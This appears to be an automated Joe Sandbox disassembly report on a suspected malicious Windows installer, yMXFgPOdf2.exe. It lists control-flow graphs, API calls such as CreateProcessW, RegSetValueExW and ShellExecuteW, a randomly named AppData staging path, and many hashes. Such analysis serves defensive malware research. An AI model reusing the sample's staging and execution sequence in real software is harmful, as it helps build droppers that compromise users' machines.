                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                  • String ID: C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Tilmeldingsprocedurens
                                                                  • API String ID: 3751793516-42787560
                                                                  • Opcode ID: c2e53e3a24d067e97163a32991b035f442807ac6a43d4a55699688dd9d396094
                                                                  • Instruction ID: 34d8f352ef9aa8656828f895e526d2bd4293bf172d5861d5c75f43cad8b5630e
                                                                  • Opcode Fuzzy Hash: c2e53e3a24d067e97163a32991b035f442807ac6a43d4a55699688dd9d396094
                                                                  • Instruction Fuzzy Hash: B2112531500104EBCF206FA0DD449AE3BB0EF05369B29453BF881F22E0D73D49808B5D

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 701 401f98-401fa4 702 402063-402065 701->702 703 401faa-401fc0 call 402b38 * 2 701->703 704 402190-402195 call 401423 702->704 713 401fd0-401fdf LoadLibraryExW 703->713 714 401fc2-401fce GetModuleHandleW 703->714 710 402791-402798 704->710 711 4029c5-4029d4 704->711 710->711 716 401fe1-401ff0 call 406177 713->716 717 40205c-40205e 713->717 714->713 714->716 721 401ff2-401ff8 716->721 722 40202b-402030 call 40504b 716->722 717->704 724 402011-402029 721->724 725 401ffa-402006 call 401423 721->725 726 402035-402038 722->726 724->726 725->726 735 402008-40200f 725->735 726->711 728 40203e-402048 call 40370b 726->728 728->711 734 40204e-402057 FreeLibrary 728->734 734->711 735->726
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 00401FC3
                                                                    • Part of subcall function 0040504B: lstrlenW.KERNEL32(Completed,00000000,0041BB2D,759223A0,?,?,?,?,?,?,?,?,?,00403103,00000000,?), ref: 00405083
                                                                    • Part of subcall function 0040504B: lstrlenW.KERNEL32(00403103,Completed,00000000,0041BB2D,759223A0,?,?,?,?,?,?,?,?,?,00403103,00000000), ref: 00405093
                                                                    • Part of subcall function 0040504B: lstrcatW.KERNEL32(Completed,00403103,00403103,Completed,00000000,0041BB2D,759223A0), ref: 004050A6
                                                                    • Part of subcall function 0040504B: SetWindowTextW.USER32(Completed,Completed), ref: 004050B8
                                                                    • Part of subcall function 0040504B: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004050DE
                                                                    • Part of subcall function 0040504B: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004050F8
                                                                    • Part of subcall function 0040504B: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405106
                                                                  • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FD4
                                                                  • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402051
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2102020369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2101995299.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102054437.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102276441.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                  • String ID: OC
                                                                  • API String ID: 334405425-1597561874
                                                                  • Opcode ID: b44a8702a8552a5d57075b821dffc7744ca75562ec938dd21493636622f58a5f
                                                                  • Instruction ID: b3ac21fa57660b76ceab9e03e352ea593c7fbc5daa3d747aca45c0be544cf33f
                                                                  • Opcode Fuzzy Hash: b44a8702a8552a5d57075b821dffc7744ca75562ec938dd21493636622f58a5f
                                                                  • Instruction Fuzzy Hash: 3B21A771900215EACF106FA5CE48A9E7EB0AF09354F70423BF610B51E0D7BD8A81DA5D

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 736 405a3c-405a48 737 405a49-405a7d GetTickCount GetTempFileNameW 736->737 738 405a8c-405a8e 737->738 739 405a7f-405a81 737->739 741 405a86-405a89 738->741 739->737 740 405a83 739->740 740->741
                                                                  APIs
                                                                  • GetTickCount.KERNEL32 ref: 00405A5A
                                                                  • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403227,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405A75
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2102020369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2101995299.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102054437.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102276441.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: CountFileNameTempTick
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                  • API String ID: 1716503409-44229769
                                                                  • Opcode ID: 553695d42fa49c729d900ffa62198f8f27b7eacb1895c33b02f4b86faf7ca5f2
                                                                  • Instruction ID: 485616ab74b01dad4b6f2028e8278cd76642f71c5b474b9ae6064b4a8122c260
                                                                  • Opcode Fuzzy Hash: 553695d42fa49c729d900ffa62198f8f27b7eacb1895c33b02f4b86faf7ca5f2
                                                                  • Instruction Fuzzy Hash: 76F03076700204BFDB008F59DD45FAFB7A8EB95750F10803AEE45E7290E6B09A548F64

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 742 40232f-402375 call 402c2d call 402b38 * 2 RegCreateKeyExW 749 4029c5-4029d4 742->749 750 40237b-402383 742->750 752 402385-402392 call 402b38 lstrlenW 750->752 753 402396-402399 750->753 752->753 756 4023a9-4023ac 753->756 757 40239b-4023a8 call 402b1b 753->757 759 4023bd-4023d1 RegSetValueExW 756->759 760 4023ae-4023b8 call 402fa0 756->760 757->756 764 4023d3 759->764 765 4023d6-4024b0 RegCloseKey 759->765 760->759 764->765 765->749 767 402791-402798 765->767 767->749
                                                                  APIs
                                                                  • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236D
                                                                  • lstrlenW.KERNEL32(0040B578,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238D
                                                                  • RegSetValueExW.KERNELBASE(?,?,?,?,0040B578,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C9
                                                                  • RegCloseKey.KERNELBASE(?,?,?,0040B578,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2102020369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2101995299.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102054437.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102276441.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateValuelstrlen
                                                                  • String ID:
                                                                  • API String ID: 1356686001-0
                                                                  • Opcode ID: 21349ac20d1ca4d9ceea6c5711b10ee8709a8512efbdc3bac0f841d0c2be42d8
                                                                  • Instruction ID: 92be6db62a7debd6b64078ffb9939270950072c0cf2fb5a53bae11f9be139373
                                                                  • Opcode Fuzzy Hash: 21349ac20d1ca4d9ceea6c5711b10ee8709a8512efbdc3bac0f841d0c2be42d8
                                                                  • Instruction Fuzzy Hash: 8F1190B1A00108BFEB00AFA1DE8AEAF777CEB54358F11403AF504B71D0D7B85D409A68

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 768 401f08-401f30 call 402b38 GetFileVersionInfoSizeW 771 4029c5-4029d4 768->771 772 401f36-401f44 GlobalAlloc 768->772 772->771 774 401f4a-401f57 GetFileVersionInfoW 772->774 776 401f59-401f70 VerQueryValueW 774->776 777 401f8f 774->777 776->777 778 401f72-401f8c call 405ce8 * 2 776->778 777->771 778->777
                                                                  APIs
                                                                  • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                                  • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                                                  • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                                  • VerQueryValueW.VERSION(?,0040A014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                                    • Part of subcall function 00405CE8: wsprintfW.USER32 ref: 00405CF5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2102020369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2101995299.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102054437.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102276441.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                  • String ID:
                                                                  • API String ID: 1404258612-0
                                                                  • Opcode ID: 90b437ca501e41d769246acc3526ee78bfc1f7e4b716acdc87d1f01b62c577f6
                                                                  • Instruction ID: 985e6d37b82d88455cf37f94a5598379594e562e2ebdb1bdff2800a7dde94c7a
                                                                  • Opcode Fuzzy Hash: 90b437ca501e41d769246acc3526ee78bfc1f7e4b716acdc87d1f01b62c577f6
                                                                  • Instruction Fuzzy Hash: B6111CB1A00109AFDB01DFA5C945DAEBBB5EF45344F21417AF500F62E1E7359E40DB29
                                                                  APIs
                                                                    • Part of subcall function 0040504B: lstrlenW.KERNEL32(Completed,00000000,0041BB2D,759223A0,?,?,?,?,?,?,?,?,?,00403103,00000000,?), ref: 00405083
                                                                    • Part of subcall function 0040504B: lstrlenW.KERNEL32(00403103,Completed,00000000,0041BB2D,759223A0,?,?,?,?,?,?,?,?,?,00403103,00000000), ref: 00405093
                                                                    • Part of subcall function 0040504B: lstrcatW.KERNEL32(Completed,00403103,00403103,Completed,00000000,0041BB2D,759223A0), ref: 004050A6
                                                                    • Part of subcall function 0040504B: SetWindowTextW.USER32(Completed,Completed), ref: 004050B8
                                                                    • Part of subcall function 0040504B: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004050DE
                                                                    • Part of subcall function 0040504B: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004050F8
                                                                    • Part of subcall function 0040504B: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405106
                                                                    • Part of subcall function 0040551C: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00430200,Error launching installer), ref: 00405541
                                                                    • Part of subcall function 0040551C: CloseHandle.KERNEL32(?), ref: 0040554E
                                                                  • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                                  • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                                  • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2102020369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2101995299.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102054437.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102276441.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                  • String ID:
                                                                  • API String ID: 3585118688-0
                                                                  • Opcode ID: da604fa8e9e7d963ef1a0ddac39428bf5e34623edae9b326b56b4d77e9e0aba2
                                                                  • Instruction ID: b5f73ffbd4a1fa015f0c2796452332fd916e9637aff9300d1e3c67c2e8cabf32
                                                                  • Opcode Fuzzy Hash: da604fa8e9e7d963ef1a0ddac39428bf5e34623edae9b326b56b4d77e9e0aba2
                                                                  • Instruction Fuzzy Hash: C911AD71900204EBCF109FA1CE449EE7AB1EF04315F20443BF901B61E1C7798A929F99
                                                                  APIs
                                                                  • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00430200,Error launching installer), ref: 00405541
                                                                  • CloseHandle.KERNEL32(?), ref: 0040554E
                                                                  Strings
                                                                  • Error launching installer, xrefs: 0040552F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2102020369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2101995299.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102054437.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102276441.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateHandleProcess
                                                                  • String ID: Error launching installer
                                                                  • API String ID: 3712363035-66219284
                                                                  • Opcode ID: e3a99de12ab609f41969ca5042cf5c1fd7ec7a17acfe207451f60b4ef79cfd79
                                                                  • Instruction ID: cf9fdeca5e40bc41ee8c953bab838b17ccc92df15d25727223da148b4173978b
                                                                  • Opcode Fuzzy Hash: e3a99de12ab609f41969ca5042cf5c1fd7ec7a17acfe207451f60b4ef79cfd79
                                                                  • Instruction Fuzzy Hash: 41E0ECB4500309ABEB00AF64DD49E6F7BBDEB04344F008575A950F2150D774D9148B68
                                                                  APIs
                                                                    • Part of subcall function 00406035: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\yMXFgPOdf2.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403201,C:\Users\user\AppData\Local\Temp\,75923420,004033E1), ref: 00406098
                                                                    • Part of subcall function 00406035: CharNextW.USER32(?,?,?,00000000), ref: 004060A7
                                                                    • Part of subcall function 00406035: CharNextW.USER32(?,"C:\Users\user\Desktop\yMXFgPOdf2.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403201,C:\Users\user\AppData\Local\Temp\,75923420,004033E1), ref: 004060AC
                                                                    • Part of subcall function 00406035: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403201,C:\Users\user\AppData\Local\Temp\,75923420,004033E1), ref: 004060BF
                                                                  • CreateDirectoryW.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004033E1), ref: 00403216
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2102020369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2101995299.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102054437.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102276441.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: Char$Next$CreateDirectoryPrev
                                                                  • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                  • API String ID: 4115351271-2030658151
                                                                  • Opcode ID: d87fad949052cfa03a28e6d8598cf07e7846d7f9d3ec73566398795b30735e76
                                                                  • Instruction ID: 8e868994f3d2bbac58875734e477fdd5edfa4fc47c6a96a7a7d594daf79fb191
                                                                  • Opcode Fuzzy Hash: d87fad949052cfa03a28e6d8598cf07e7846d7f9d3ec73566398795b30735e76
                                                                  • Instruction Fuzzy Hash: FBD0C92214693062D652376A7D4AFCF0D0C8F063AEF26407BF804B51E69B7C0AC649FE
                                                                  APIs
                                                                    • Part of subcall function 00402C42: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C6A
                                                                  • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402481
                                                                  • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 00402494
                                                                  • RegCloseKey.KERNELBASE(?,?,?,0040B578,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2102020369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2101995299.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102054437.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102276441.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: Enum$CloseOpenValue
                                                                  • String ID:
                                                                  • API String ID: 167947723-0
                                                                  • Opcode ID: 7cb3e1a340c37208c1fb63bbc66ec0d7d04384155e110c3177caa8bd9d1a98e2
                                                                  • Instruction ID: c9031ee09ce8bee28904ed1c285a81cc521ca788ea043c2b6b00717a23bbda57
                                                                  • Opcode Fuzzy Hash: 7cb3e1a340c37208c1fb63bbc66ec0d7d04384155e110c3177caa8bd9d1a98e2
                                                                  • Instruction Fuzzy Hash: 0EF0F4B1600205AFE7108F65DE8CABF767CEF40358F21443EF445B21C0DAB85D409B29
                                                                  APIs
                                                                  • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Tilmeldingsprocedurens,?), ref: 00401E3D
                                                                  Strings
                                                                  • C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Tilmeldingsprocedurens, xrefs: 00401E26
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2102020369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2101995299.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102054437.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102276441.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: ExecuteShell
                                                                  • String ID: C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Tilmeldingsprocedurens
                                                                  • API String ID: 587946157-42787560
                                                                  • Opcode ID: 93d64ffd1e537835371bfd6882af04086357290893017d01e8ef83964071ead1
                                                                  • Instruction ID: 1911b2733719e8945681546b31a0b6b9e0b67ed3329d32444ff49021a4b7533d
                                                                  • Opcode Fuzzy Hash: 93d64ffd1e537835371bfd6882af04086357290893017d01e8ef83964071ead1
                                                                  • Instruction Fuzzy Hash: 63F0F675750200ABDB006FB5DD4AE9E33B4AB64729F200937F501F70C1D6FC88419629
                                                                  APIs
                                                                    • Part of subcall function 00402C42: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C6A
                                                                  • RegQueryValueExW.ADVAPI32(00000000,00000000,?,00000800,?,?,?,?,00000033), ref: 0040240F
                                                                  • RegCloseKey.KERNELBASE(?,?,?,0040B578,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2102020369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2101995299.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102054437.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102276441.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpenQueryValue
                                                                  • String ID:
                                                                  • API String ID: 3677997916-0
